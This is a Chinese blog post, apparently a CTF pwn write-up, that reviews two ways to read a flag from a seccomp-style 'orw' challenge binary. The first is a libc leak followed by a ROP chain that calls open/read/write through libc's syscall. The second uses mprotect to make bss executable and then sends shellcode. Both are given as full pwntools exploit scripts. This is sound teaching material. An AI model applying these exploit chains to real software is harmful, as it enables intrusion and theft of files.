栈上orw关于使用libc以及mprotect+shellcode的用法

已于 2024-01-11 12:02:01 修改
阅读量412 收藏 6
点赞数 5
分类专栏: pwn 文章标签: python
于 2024-01-11 12:01:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fuiifiuiii/article/details/135524157
版权

栈上orw关于使用libc以及mprotect+shellcode的用法

  • 题目详情类似于之前写的那个orw–libc,这里主要是回顾一下复习一下(太久没打了)
  • 这一波写的脚本比上次写的清楚多了(毕竟这次是回顾,上次是新学)
  1. 第一种,用libc的syscall函数来调用open、然后用read+write读出。
  • 文件本身没有的pop_rdx啥的可以从libc文件离读取偏移,再用基地址加就可以了
  • 这里需要注意的一点是要用read把flag这个名字读进去,这里读到了已知的固定地址bss段上。
from pwn import*
#context(log_level='debug',arch='i386',os='linux')
context(log_level='debug',arch='amd64',os='linux')

p=process('./orw')

puts_plt=0x400700
puts_got=0x601028
back_addr=0x4009AF
pop_rdi = 0x0000000000400aa3
bss_addr = 0x601500


payload = b'A'*(0x40+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(back_addr)

p.send(payload)

puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))

success(hex(puts_addr))

libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')

libc_base = puts_addr - libc.sym['puts']
read_addr = libc_base +libc.sym['read']
write_addr = libc_base+libc.sym['write']
pop_rdx= libc_base + 0x0000000000001b96
pop_rsi = libc_base + 0x0000000000023a6a
syscall_addr = libc_base +libc.sym['syscall']


payload = b"A"*(0x40+8)+p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(bss_addr)+p64(pop_rdx)+p64(8)+p64(read_addr)+p64(back_addr)
payload=payload.ljust(0x100,b'\x00')

#gdb.attach(p)
#pause(1)

p.send(payload)

p.send(b'./flag\x00\x00')

payload = b"A"*(0x48)+p64(pop_rdi)+p64(2)+p64(pop_rsi)+p64(bss_addr)+p64(pop_rdx)+p64(0)+p64(syscall_addr)
payload+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(bss_addr)+p64(pop_rdx)+p64(0x20)+p64(read_addr)
payload+=p64(pop_rdi)+p64(1)+p64(write_addr)

#gdb.attach(p)
#pause(1)

p.send(payload)

p.interactive()
  1. 第二种,用mprotect+shellcode
from pwn import*
#context(log_level='debug',arch='i386',os='linux')
context(log_level='debug',arch='amd64',os='linux')

p=process('./orw')

puts_plt=0x400700
puts_got=0x601028
back_addr=0x4009AF
pop_rdi = 0x0000000000400aa3
bss_addr=0x601000

payload = b'A'*(0x40+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(back_addr)

p.send(payload)

puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))

success(hex(puts_addr))

libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_base = puts_addr - libc.sym['puts']
pop_rdx= libc_base + 0x0000000000001b96
pop_rsi = libc_base + 0x0000000000023a6a
mprotect_addr = libc_base + libc.sym['mprotect']
read_addr = libc_base + libc.sym['read']

payload = b"A"*(0x48)+p64(pop_rdi)+p64(bss_addr)+p64(pop_rsi)+p64(0x1000)+p64(pop_rdx)+p64(7)+p64(mprotect_addr)+p64(back_addr)

#gdb.attach(p)
#pause(1)

p.send(payload)

payload = b"A"*(0x48)+p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(bss_addr+0x500)+p64(pop_rdx)+p64(0x200)+p64(read_addr)+p64(bss_addr+0x500)
payload = payload.ljust(0x100,b'\x00')
#gdb.attach(p)
#pause(1)
p.send(payload)

shellcode = shellcraft.open('flag')
shellcode +=shellcraft.read('3','rsp',0x20)
shellcode +=shellcraft.write('1','rsp',0x20)

payload = asm(shellcode)

p.send(payload)

p.interactive()

有什么疑问的可以直接提出。

XYYR-c
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux系统调用
nanfenglei23的专栏
12-14 1680
从原理到具体实现详细解释linux系统调用
【八芒星计划】 ORW
carol2358的博客
09-01 3909
本篇用来记录ORWORW可以分为2.27以下的orw和2.29以上的orw,如果是本地请自备flag文件 orw技术是用来应对沙盒的 文章目录oooorder2019-BALSN-CTF-plaintext oooorder 本题是2.27的orw,漏洞是uaf,漏洞在这里不展开讲,uaf也并不难 2.27的orw既可以使用heap_addr,也可以不要,先讲不需要heap_addr的,毕竟能少泄漏就少泄漏 最重要的是使用了setcontext这个函数,来达成我们控制寄存器的目的 2.27得setcont
【Linux】syscall系统调用原理及实现
热门推荐
楠燊.tech
02-22 1万+
linux syscall系统调用
[XYCTF新生赛]-PWN:static_link解析(mprotect利用,shellcode
2301_79326813的博客
04-04 188
查看ida这里就一个输入点,并且题目没给libc库,说明很有可能用shellcode
libc库和系统调用
u014426028的博客
02-28 2163
Linux系统调用这部分经常出现两个词:libc库和封装函数,不知道你是否清楚它们的含义? libc 1. libc概念 libc是Stantard C Library的简称,它是符合ANSI C标准的一个标准函数库。libc库提供C语言中所使用的宏,类型的定义,字符串操作符,数学计算函数以及输入输出函数等。正如ANSI C是C语言的标准一样,libc只是一个函数库标准,每个操作系统都...
Linux系统调用(syscall)原理(转载)
lqw198421的专栏
09-09 1579
转载链接: http://gityuan.com/2016/05/21/syscall/ 引言:分析Android源码的过程中,要想从上至下完全明白一行代码,往往涉及app、framework、native一直到kernel,可能迷失到代码世界,明白了系统调用原理,或许能帮你峰回路转,找到进入kernel函数的入口。本文主要讲解ARM架构相关源码: /bionic/libc/kernel/uapi/asm-arm/asm/unistd.h /bionic/libc/arch-arm
[pwn]ROP:灵活运用syscall
Breeze的博客
08-26 9822
灵活运用syscall 遇到了一个程序并不复杂,但利用却很麻烦的题目,Recho题目详细writeup,题目地址:Recho 按照惯例,查看安全策略: 基本没啥安全策略,然后查看程序逻辑,程序很短,就一个main: 很容易就找到溢出点,大体逻辑就是,先输入一个数,小于15会被认为是16,然后再输入一串字符串,程序会将前x(刚输入的数字)个字符拷贝到buf中,这里没有上限,所以存在溢出。但问题是...
计算机系统基础第二次作业(1).doc
05-25
(1)movl 0xFF, (%eax) (2)movb %ax, 12(%ebp) (3)addl %ecx, $0xF0 (4)orw $0xFFFF0, (%ebx) (5)addb $0xF8, (%dl) (6)movl %bx, %eax (7)andl %esi, %esx (8)movw 8(%ebp, , 4), %ax 答: (1)...
计算机系统基础第二次作业.doc
05-25
(1)movl 0xFF, (%eax) (2)movb %ax, 12(%ebp) (3)addl %ecx, $0xF0 (4)orw $0xFFFF0, (%ebx) (5)addb $0xF8, (%dl) (6)movl %bx, %eax (7)andl %esi, %esx (8)movw 8(%ebp, , 4), %ax 答: (1)...
vagrant-neosdev:TYPO3 Neos 和 Flow 通用开发服务器
05-31
已弃用! 请参阅 (使用 ansible 代替 puppet) MOC TYPO3 Neos and Flow 通用开发服务器 用于在类似于 MOC 托管生产机器的环境中开发 TYPO3 Flow 和 Neos 站点...sudo mount -orw -oresvport -t nfs 192.168.66.80:/
浅析3G网络安全.pdf
06-08
accord ing tO 3G netw ork dat a securi ty and ident ity auth ent icati on£ th e paper p ut f orw ard the i mpro vement sug gesti ons £ K e) £ w o r d s £" 3G netw or k £» net w or k sec ur it y ...
Latency and Bandwidth Impact on GPU Systems - 2008 (ms-proj-gpgpu-latency-bandwidth)-计算机科学
04-22
orw eg ian Un ive rsit yo fS cie nce an dT ech no log yF acu lty of Info rma tio nT ech no log y, Ma the ma tics an dE lect rica l En gin ee rin gD ep art me nt of Co mp ute ra nd In form ati...
linux c之syscall使用例子
云守护的专栏
08-09 8674
#include extern char **__environ; /* pointer to array of char * strings that define the current environment variables */ extern int errno; extern char _end, _edata, _etext, __executable_start; in
Linux系统调用(syscall)原理(转)
weixin_34245169的博客
03-13 1589
引言:分析Android源码的过程中,要想从上至下完全明白一行代码,往往涉及app、framework、native一直到kernel,可能迷失到代码世界,明白了系统调用原理,或许能帮你峰回路转,找到进入kernel函数的入口。本文主要讲解ARM架构相关源码: /bionic/libc/kernel/uapi/asm-arm/asm/unistd.h /bionic/libc/arch-ar...
显示recv调用次数_ctf中关于syscall系统调用的简单分析
weixin_39820136的博客
11-22 186
原创 紫色仰望 合天智汇 0x01我在动态调试这个程序的时候,发现 syscall调用 系统函数 的过程很有趣,于是便记录下来 希望对大家 能带来些帮助,这里 以 buu 平台上的 ciscn_2019_s_3 为例,给大家详细地分享以及分析下!0x02在开始之前,我们先来认真 学习下 read(),write()的 原型:read(): ssize_t read(int fd,const vo...
linux下syscall函数,SYS_gettid,SYS_tgkill
lx_shudong的专栏
05-15 3755
原文:http://blog.chinaunix.net/uid-28458801-id-4630215.html NAME               syscall - 间接系统调用 SYNOPSIS               #define _GNU_SOURCE                #include        #include           
基于JavaScript 如何实现爬山算法以及优化方案
乐闻世界
06-10 1454
爬山算法(Hill Climbing Algorithm)是一种常见的启发式搜索算法,常用于解决优化问题。其核心思想是从一个初始状态出发,通过逐步选择使目标函数值增大的邻近状态来寻找最优解。接下来,我们将通过 JavaScript 实现一个简单的爬山算法,帮助大家理解其原理和应用。从一个初始状态开始。评估当前状态的目标函数值。在当前状态的邻居中选择一个目标函数值更大的状态。如果找到了更优的邻居,则移动到该邻居并重复步骤2和步骤3。如果没有更优的邻居,则算法结束,当前状态即为局部最优解。
GLM+vLLM 部署调用
最新发布
qq_38915354的博客
06-13 1124
vLLM 框架是一个高效的大型语言模型(LLM)推理和部署服务系统
return orw();
12-19
return orw()是一个函数调用表达式,它会调用名为orw()的函数,并将函数的返回值作为整个表达式的值返回。 在这个表达式中,orw()表示一个被定义的函数。函数调用的一般形式是函数名后跟一对括号,括号中可以包含一些参数。这里的orw()没有提供参数,表示函数调用时没有传递任何参数给这个函数。 在函数调用完成后,使用return关键字可以将函数的返回值作为整个表达式的值返回给调用者。这个返回值可以是任何类型的值,包括整数、浮点数、字符串等。 需要注意的是,这个表达式中没有给出具体的函数定义和实现,因此无法确定orw()函数的具体功能和返回值类型。如果想要理解orw()的具体含义,需要查看定义和实现该函数的代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值